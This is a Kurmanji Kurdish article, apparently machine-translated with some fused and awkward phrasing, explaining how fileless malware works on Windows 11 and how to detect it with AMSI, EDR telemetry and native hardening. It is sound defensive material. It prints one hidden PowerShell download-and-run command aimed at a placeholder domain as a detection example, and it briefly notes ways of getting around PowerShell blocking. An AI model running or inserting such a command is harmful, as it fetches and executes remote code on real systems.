Meriv çawa malwareya bê pel a xeternak di Windows 11-ê de tespît dike

¿Meriv çawa malwareya bê pel a xeternak tesbît dike? Çalakiya êrîşên bê pel bi girîngî zêde bûye, û ji bo ku rewşê xirabtir bike, Windows 11 ne ewle yeEv rêbaz ji dîskê derbas dibe û xwe dispêre bîrê û amûrên pergalê yên rewa; ji ber vê yekê bernameyên antîvîrusê yên li ser bingeha îmzeyê zehmetiyan dikişînin. Ger hûn li rêyek pêbawer digerin ku wê tespît bikin, bersiv di hevgirtina telemetrî, analîza tevgerê, û kontrolên Windows-ê.

Di ekosîstema heyî de, kampanyayên ku PowerShell, WMI, an Mshta îstismar dikin, bi teknîkên sofîstîketir ên wekî derzîkirina bîranînê, mayîndekirina "bêyî destdana" dîskê, û heta binpêkirinên firmwareKilît ew e ku meriv nexşeya tehdîdê, qonaxên êrîşê û çi sînyalan dihêlin fam bike, tewra dema ku her tişt di RAM-ê de diqewime jî.

Malwareya bê pel çi ye û çima di Windows 11 de pirsgirêkek e?

Dema ku em behsa gefên "bê pel" dikin, em behsa koda xerabkar dikin ku Pêdivîya te bi danîna pelên nû yên bicîhkirinê tune di pergala pelan de ji bo xebitandinê. Ew bi gelemperî di pêvajoyên xebitandinê de tê derzîkirin û di RAM-ê de tê bicîhanîn, bi xwe ve girêdide şîrovekar û pelên dualî yên ku ji hêla Microsoft-ê ve hatine îmzekirin (mînak, PowerShell, WMI, rundll32, mshtaEv şopa we kêm dike û dihêle hûn motorên ku tenê li pelên gumanbar digerin, derbas bikin.

Heta belgeyên nivîsgehê an PDF-ên ku ji bo destpêkirina fermanan ji qelsiyan sûd werdigirin jî wekî beşek ji vê diyardeyê têne hesibandin, ji ber ku çalakkirina darvekirinê di bîranînê de bêyî ku dualîyên bikêrhatî ji bo analîzê werin hiştin. Îstismara makro û DDE Di Office de, ji ber ku kod di pêvajoyên rewa yên mîna WinWord de dimeşe.

Êrîşkar endezyariya civakî (phishing, girêdanên spam) bi dafikên teknîkî re li hev dicivînin: klîka bikarhêner zincîreyekê dest pê dike ku tê de skrîptek barkirina dawîn di bîrê de dakêşîne û bicîh tîne, dûrketina ji şopê li ser dîskê. Armanc ji dizîna daneyan bigire heya pêkanîna ransomware, û tevgera bêdeng a alî diguhere.

Tîpolojî li gorî şopa lingê di pergalê de: ji 'safî' heta hîbrîd

Ji bo rêgirtina li tevlihevkirina têgehan, ji hev veqetandina gefan li gorî asta têkiliya wan bi pergala pelan re kêrhatî ye. Ev kategorîzekirin zelal dike. çi berdewam dike, kod li ku dijî, û çi nîşanan dihêle?.

Tîpa I: çalakiya pelan tune

Malwareya bê pel û pel tiştekî li ser dîskê nanivîse. Nimûneyek klasîk bikaranîna lawaziya torê (wek vektora EternalBlue ya berê) ji bo pêkanîna deriyekî paşîn ê ku di bîra kernel de dimîne (rewşên mîna DoublePulsar). Li vir, her tişt di RAMê de diqewime û di pergala pelan de ti artefakt tune ne.

Vebijarkek din jî qirêjkirina firmware ji pêkhateyan: BIOS/UEFI, adaptorên torê, cîhazên USB (teknîkên celebê BadUSB) an jî binsîstemên CPU. Ew bi destpêkirina ji nû ve destpêkirin û ji nû ve sazkirinê ve berdewam dikin, digel zehmetiya zêde ku Çend berhem firmware kontrol dikinEv êrîşên aloz in, kêm caran çêdibin, lê ji ber dizî û domdariya xwe xeternak in.

Tîpa II: Çalakiya arşîvkirina nerasterast

Li vir, malware pelê xwe yê bicîhkirî "nahêle", lê konteynerên ku ji hêla pergalê ve têne rêvebirin bikar tîne ku di bingeh de wekî pelan têne hilanîn. Mînakî, deriyên paşîn ên ku têne çandin fermanên powershell di depoya WMI de û pêkanîna wê bi fîlterên bûyeran çalak bike. Mimkun e ku meriv wê ji rêza fermanan bêyî avêtina pelên dualî saz bike, lê depoya WMI li ser dîskê wekî databaseyek rewa dimîne, ji ber vê yekê paqijkirina wê bêyî bandorkirina pergalê dijwar dike.

Ji aliyê pratîkî ve ew bê pel têne hesibandin, ji ber ku ew konteyner (WMI, Registry, hwd.) Ew ne pêkanînek klasîk a tespîtkirî ye Û paqijkirina wê ne tiştekî hêsan e. Encam: berdewamiyeke veşartî bi şopa "kevneşopî" ya hindik.

Tîpa III: Ji bo fonksiyonê pelan hewce dike

Hin rewş, berdewamiya 'bê pel' Di asta mantiqî de, ew hewceyê tetikek li ser bingeha pelan in. Nimûneya tîpîk Kovter e: ew lêkerek qalikê ji bo dirêjkirinek rasthatî tomar dike; dema ku pelek bi wê dirêjkirinê tê vekirin, skrîptek piçûk bi karanîna mshta.exe tê destpêkirin, ku rêza zirardar ji Registry ji nû ve ava dike.

Hîle ew e ku ev pelên "tamê" yên bi dirêjkirinên rasthatî bargiraniyek analîzkirî nagirin, û piraniya kodê di qeydkirina (konteynerek din). Ji ber vê yekê ew di bandorê de wekî bê pel têne dabeş kirin, her çend bi rastî ew bi yek an çend artefaktên dîskê wekî tetikek ve girêdayî ne.

Vektor û 'mazûvan'ên enfeksiyonê: ew dikeve ku derê û li ku vedişêre

Ji bo baştirkirina tespîtkirinê, girîng e ku xala ketinê û mêvandarê enfeksiyonê were nexşandin. Ev perspektîf dibe alîkar ku meriv sêwiran bike. kontrolên taybetî Pêşîyê bide telemetriya guncaw.

serketinên

• Li ser bingeha pelan (Cureyê III): Belge, pelên bicîhkirî, pelên Flash/Java yên kevn, an pelên LNK dikarin gerok an motora ku wan pêvajo dike bikar bînin da ku koda shellê li bîrê bar bikin. Vektora yekem pelek e, lê bar diçe RAMê.
• Li ser bingeha torê (Cureyê I): Pakêtek ku ji qelsiyekê sûd werdigire (mînak, di SMB de) di qada bikarhêner an kernel de pêk tê. WannaCry vê rêbazê populer kir. Barkirina rasterast a bîranînê bê dosyayek nû.

Car

• Amûr (Tîpa I): Firmwareya dîsk an karta torê dikare were guhertin û kod were danîn. Teftîşkirin dijwar e û li derveyî OS-ê berdewam dike.
• CPU û binsîstemên rêveberiyê (Tîpa I): Teknolojiyên wekî ME/AMT ya Intelê rêyên ji bo Torgilokkirin û darvekirin li derveyî OS-êEw di astek pir nizm de êrîş dike, bi potansiyeleke pir zêde ya dizîbûnê.
• USB (Tîpa I): BadUSB dihêle hûn ajokerek USB-ê ji nû ve bername bikin da ku klavyeyek an NIC-ê teqlîd bike û fermanan bide destpêkirin an trafîkê beralî bike.
• BIOS / UEFI (Tîpa I): ji nû ve bernamekirina firmware ya zirardar (rewşên mîna Mebromi) ku berî bootkirina Windows-ê dixebite.
• Hypervisor (Cureyê I): Bicîhkirina mînî-hîpervîzorek di bin pergala xebitandinê de ji bo veşartina hebûna wê. Kêm caran tê dîtin, lê di forma rootkitên hîpervîzor de berê tê dîtin.

Pêkanîn û derzîkirin

• Li ser bingeha pelan (Cureyê III): EXE/DLL/LNK an jî karên bernamekirî yên ku derzîlêdanan dixin nav pêvajoyên rewa.
• Macros (Tîpa III): VBA di Office de dikare barên bikêrhatî, tevî ransomware-a tevahî, bi razîbûna bikarhêner bi rêya xapandinê deşîfre bike û bicîh bîne.
• Lîsans (Cureyê II): PowerShell, VBScript an JScript ji pelê, rêza fermanê, xizmet, Qeydkirin an WMIÊrîşkar dikare di danişînek dûr de bêyî ku dest bide dîskê skrîptê binivîse.
• Tomara bootkirinê (MBR/Boot) (Tîpa II): Malbatên mîna Petya sektora bootê ji nû ve dinivîsin da ku di destpêkê de kontrolê bigirin destê xwe. Ew li derveyî pergala pelan e, lê ji bo OS û çareseriyên nûjen ên ku dikarin wê vegerînin gihîştî ye.

Êrîşên bê pel çawa dixebitin: qonax û sînyalan

Her çend ew pelên bicîhanîn nahêlin jî, kampanya mantiqek qonaxî dişopînin. Fêmkirina wan dihêle ku çavdêrî were kirin. bûyer û têkiliyên di navbera pêvajoyan de ku şopek dihêlin.

• Gihîştina destpêkêÊrîşên phishingê bi karanîna lînk an pêvekan, malperên xeternak, an jî bawernameyên dizî. Gelek zincîr bi belgeyeke Office dest pê dikin ku fermanekê çalak dike. PowerShell.
• Li sersekinî: deriyên paşîn bi rêya WMI (fîlter û abonetiyan), Bişkojkên bicîhanîna qeydê an jî karên bernamekirî yên ku skrîptan bêyî pelek nû ya zirardar ji nû ve dest pê dikin.
• DerxistinDema ku agahî hatin berhevkirin, ew bi karanîna pêvajoyên pêbawer (gerok, PowerShell, bitsadmin) ji torê tê şandin da ku trafîkê tevlihev bike.

Ev şêwaz bi taybetî xeternak e ji ber ku nîşaneyên êrîşê Ew di normalbûnê de vedişêrin: argumanên xeta fermanê, zincîra pêvajoyê, girêdanên derketinê yên anormal, an gihîştina API-yên derzîkirinê.

Teknîkên hevpar: ji bîranînê heta tomarkirinê

Aktor li ser gelek waran disekinin rêbazên ku nepenîtiyê baştir dikin. Ji bo çalakkirina tespîtkirina bi bandor, zanîna yên herî gelemperî kêrhatî ye.

• Niştecîh di bîranînê deBarkirina barên bikêrhatî di qada pêvajoyek pêbawer de ku li benda çalakkirinê ye. rootkit û çengelan Di navikê de, ew asta veşartinê bilind dikin.
• Berdewamî di Qeyda Registry deBlobên şîfrekirî di mifteyan de hilînin û wan ji destpêkerek rewa (mshta, rundll32, wscript) ji nû ve ava bikin. Sazkerê demkî dikare xwe ji bo kêmkirina bandora xwe hilweşîne.
• Fishinga bawernameyanÊrîşkar bi karanîna navên bikarhêner û şîfreyên dizî, qalik û santralên dûr bicîh tîne. gihîştina bêdeng di Qeyda Registry an WMI de.
• Ransomware 'Bêpel'Şîfrekirin û ragihandina C2 ji RAMê têne organîzekirin, û heta ku zirar neyê dîtin, derfetên tespîtkirinê kêm dikin.
• Kitên xebitandinêzincîrên otomatîkî ku qelsiyan tesbît dikin û barkirinên tenê-bîrê piştî ku bikarhêner klîk dike bicîh dikin.
• Belgeyên bi kodêmakro û mekanîzmayên mîna DDE ku fermanan bêyî tomarkirina pelên bicîhanînê li ser dîskê çalak dikin.

Lêkolînên pîşesaziyê berê jî lûtkeyên berbiçav nîşan dane: di heyamek ji sala 2018an de, a zêdebûna ji %90 zêdetir di êrîşên zincîrî yên li ser bingeha skrîptê û PowerShell de, nîşanek e ku vektor ji bo bandorkeriya xwe tê tercîh kirin.

Pirsgirêka ji bo şîrket û dabînkeran: çima astengkirin têrê nake

Ew ê balkêş be ku PowerShell neçalak bike an makroyan her û her qedexe bike, lê Hûn ê operasyonê têk bibinPowerShell stûnek rêveberiya nûjen e û Office di karsaziyê de pir girîng e; astengkirina kor pir caran ne gengaz e.

Wekî din, rê hene ku meriv kontrolên bingehîn derbas bike: xebitandina PowerShell bi rêya DLL û rundll32, pakêtkirina skrîptan di nav EXEyan de, Kopiya xwe ya PowerShell-ê bînin an jî nivîsaran di wêneyan de veşêrin û wan di bîrê de derxînin. Ji ber vê yekê, parastin nikare tenê li ser înkarkirina hebûna amûran be.

Xeletiyeke din a hevpar ew e ku hemû biryar li ser ewr tê danîn: eger ajan neçar bimîne ku li benda bersiveke ji serverê be, Hûn pêşîlêgirtina rast-dem winda dikinDaneyên telemetrîyê dikarin werin barkirin da ku agahdariyê dewlemend bikin, lê Pêdivî ye ku kêmkirina bandorê di dawiya demê de çêbibe.

Meriv çawa malwareya bê pel di Windows 11-ê de tespît dike: telemetrî û tevger

Stratejiya serketinê ew e çavdêriya pêvajoyan û bîranînêNe pel. Reftarên xerabkar ji formên ku pelek digire stabîltir in, ji ber vê yekê ew ji bo motorên pêşîlêgirtinê îdeal in.

• AMSI (Navrûya Skenkirina Antîmalware)Ew skrîptên PowerShell, VBScript, an JScript digire, tewra dema ku ew bi awayekî dînamîk di bîrê de hatine çêkirin jî. Ji bo girtina rêzikên tarî berî darvekirinê pir baş e.
• Çavdêriya pêvajoyêdestpêk/dawî, PID, dêûbav û zarok, rê, rêzikên fermanê û heş, û her weha darên darvekirinê ji bo fêmkirina çîroka tevahî.
• Analîza bîranînê: tespîtkirina derzîlêdan, barên refleksîf an PE bêyî destdana dîskê, û nirxandina herêmên bicîhkirî yên neasayî.
• Parastina sektora destpêkêkontrolkirin û sererastkirina MBR/EFI di rewşa destwerdanê de.

Di ekosîstema Microsoftê de, Defender for Endpoint AMSI-yê bi hev re dike yek, çavdêriya tevgerêSkenkirina bîranînê û fêrbûna makîneyê ya li ser ewr tê bikar anîn da ku tespîtan li gorî guhertoyên nû an jî yên veşartî bipîvin. Firoşkarên din jî rêbazên wekhev bi motorên niştecî yên kernel bikar tînin.

Nimûneyek rastîn a têkiliyê: ji belgeyê heta PowerShell

Zincîrekê xeyal bikin ku Outlook pêvekekê dakêşîne, Word belgeyê vedike, naveroka çalak tê çalakkirin, û PowerShell bi parametreyên gumanbar tê destpêkirin. Telemetrîya rast dê nîşan bide Rêzika fermanê (mînak, ExecutionPolicy Bypass, pencereya veşartî), girêdana bi domainek ne pêbawer û afirandina pêvajoyek zarok ku xwe di AppData de saz dike.

Ajanek bi çarçoveya herêmî dikare raweste û paşve bizivire çalakiya xerabkar bêyî destwerdana destan, ji bilî agahdarkirina SIEM an bi rêya e-name/SMS. Hin berhem tebeqeyek sedema bingehîn lê zêde dikin (modelên celebê StoryLine), ku ne ber bi pêvajoya xuya (Outlook/Word), lê ber bi têla xerabkar a tijî û eslê wê ji bo paqijkirina berfireh a pergalê.

Şêweyekî fermanê yê tîpîk ku divê meriv li ber çavan bigire dibe ku wiha xuya bike: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Lojîk ne rêzika rast e, lê komek ji sînyalan: derbaskirina polîtîkayê, pencereya veşartî, dakêşana paqij, û bicîhanîna di bîrê de.

AMSI, boriyek û rola her aktorî: ji xala dawî heta SOC

Ji bilî girtina senaryoyê, mîmariyeke xurt gavên ku lêkolîn û bersivê hêsan dikin rêk dixe. Berî bicîhanîna barkirinê, çiqas delîl zêdetir bin, ewqas çêtir e., çêtirîn.

• Girtina skrîptêAMSI naverokê (heta ku di cih de were çêkirin jî) ji bo analîza statîk û dînamîk di boriyeke malware de radest dike.
• Bûyerên pêvajoyêPID, duqatî, hash, rê û daneyên din têne berhevkirin. argumana, sazkirina darên pêvajoyê yên ku ber bi barkirina dawî ve çûn.
• Tesbîtkirin û raporkirinTesbît li ser konsola hilberê têne nîşandan û ji bo dîtbarîkirina kampanyayê ji platformên torê (NDR) re têne şandin.
• Garantiyên bikarhênerTew heke skrîptek di bîrê de were derzîkirin jî, çarçove AMSI wê digire di guhertoyên hevgirtî yên Windows-ê de.
• Kapasîteyên rêveberiyê: mîhengkirina polîtîkayê ji bo çalakkirina vekolîna skrîptê, astengkirina li ser bingeha tevgerê û raporên ji konsolê çêdikin.
• Karê SOC: derxistina artefaktan (VM UUID, guhertoya OS, celebê skrîptê, pêvajoya destpêker û dêûbavê wê, hash û xetên fermanan) ji bo ji nû ve afirandina dîrokê û qaîdeyên asansorê dahatû.

Dema ku platform destûrê dide hinardekirinê tampona bîrê Bi darvekirinê ve girêdayî, lêkolîner dikarin tespîtên nû çêbikin û parastinê li dijî guhertoyên wekhev dewlemend bikin.

Tedbîrên pratîkî di Windows 11 de: pêşîlêgirtin û nêçîr

Ji bilî hebûna EDR bi vekolîna bîranînê û AMSI, Windows 11 dihêle hûn cîhên êrîşê bigirin û dîtinê baştir bikin bi kontrolên xwemalî.

• Qeydkirin û sînorkirin di PowerShell deTomarkirina Bloka Skrîptê û Tomarkirina Modulê çalak dike, modên sînorkirî li cihê ku gengaz be bicîh tîne, û karanîna kontrol dike. Derbaskirin/Veşartî.
• Rêgezên Kêmkirina Rûyê Êrîşê (ASR): destpêkirina skrîptan ji hêla pêvajoyên Office ve asteng dike û Zêdexwarina WMI/PSExec dema ku pêwîst nebe.
• Polîtîkayên makro yên nivîsgehê: bi xweber, îmzekirina makro ya navxweyî û navnîşên baweriyê yên hişk neçalak dike; herikînên DDE yên kevn dişopîne.
• Denetim û Qeyda WMI: abonetiyên bûyeran û mifteyên darvekirina otomatîk (Run, RunOnce, Winlogon), û her weha afirandina peywirê dişopîne plansaz kirin.
• Parastina destpêkê"Secure Boot" çalak dike, yekparebûna MBR/EFI kontrol dike û piştrast dike ku di dema destpêkirinê de guhertin tune ne.
• Çêkirin û hişkkirin: kêmasiyên bikêrhatî di gerok, pêkhateyên Office û karûbarên torê de digire.
• Zanetî: bikarhêner û tîmên teknîkî li ser phishing û sînyalên darvekirinên veşartî.

Ji bo nêçîrê, li ser pirsên li ser van mijaran bisekinin: afirandina pêvajoyan ji hêla Office ve ber bi PowerShell/MSHTA ve, argumanên bi rêza dakêşanê/pelê dakêşanêSkrîptên bi tarîbûna zelal, derzîkirinên refleksîf, û torên derketinê bo TLD-yên gumanbar. Ji bo kêmkirina deng, van sînyalan bi navûdeng û frekansê re xaç bikin.

Îro her motorek dikare çi tesbît bike?

Çareseriyên pargîdaniyê yên Microsoft-ê AMSI, analîtîkên reftariyê, û bîrê binirxîne û parastina sektora bootkirinê, digel modelên ML-ê yên li ser ewr-ê da ku li dijî gefên nû werin pîvandin. Firoşkarên din çavdêriya asta kernel-ê bicîh tînin da ku nermalava xerab ji nermalava nebaş bi vegerandina otomatîkî ya guhertinan cuda bikin.

Nêzîkatiyek li ser bingeha çîrokên îdamê Ew dihêle hûn sedema bingehîn nas bikin (mînakî, pêvekek Outlook-ê ku zincîrekê çalak dike) û tevahiya darê sivik bikin: skrîpt, mifte, peywir û pelên dualî yên navîn, ji asêbûna li ser nîşana xuya dûr bisekinin.

Xeletiyên hevpar û çawa ji wan dûr bisekinin

Astengkirina PowerShell bêyî planeke rêveberiyê ya alternatîf ne tenê ne pratîkî ye, lê di heman demê de hene rêbazên ji bo gazîkirina wê nerasterastEv yek ji bo makroyan jî derbas dibe: yan hûn wan bi polîtîka û îmzeyan birêve dibin, yan jî karsazî dê zirarê bibîne. Çêtir e ku meriv li ser telemetrî û qaîdeyên tevgerî bisekine.

Xeletiyeke din a hevpar ew e ku bawer dikin sepanên navnîşa spî her tiştî çareser dikin: teknolojiya bê pel tam li ser vê yekê ye. sepanên pêbawerDivê kontrol çavdêriya tiştên ku ew dikin û çawa bi hev ve girêdayî ne bike, ne tenê gelo destûr ji wan re hatiye dayîn an na.

Bi van hemûyan re, malwareya bê pelan êdî "xeyal" nabe dema ku hûn tiştê ku bi rastî girîng e dişopînin: reftar, bîr û eslê ji her pêkanînê. Têkelkirina AMSI, telemetriya pêvajoyê ya dewlemend, kontrolên xwemalî yên Windows 11, û çînek EDR bi analîza tevgerî avantajê dide we. Polîtîkayên rastîn ji bo makroyan û PowerShell, venêrîna WMI/Qeydê, û nêçîra ku rêzên fermanan û darên pêvajoyê dide pêşîniyê li hevkêşeyê zêde bikin, û hûn ê parastinek hebe ku van zincîran berî ku deng derxînin qut dike.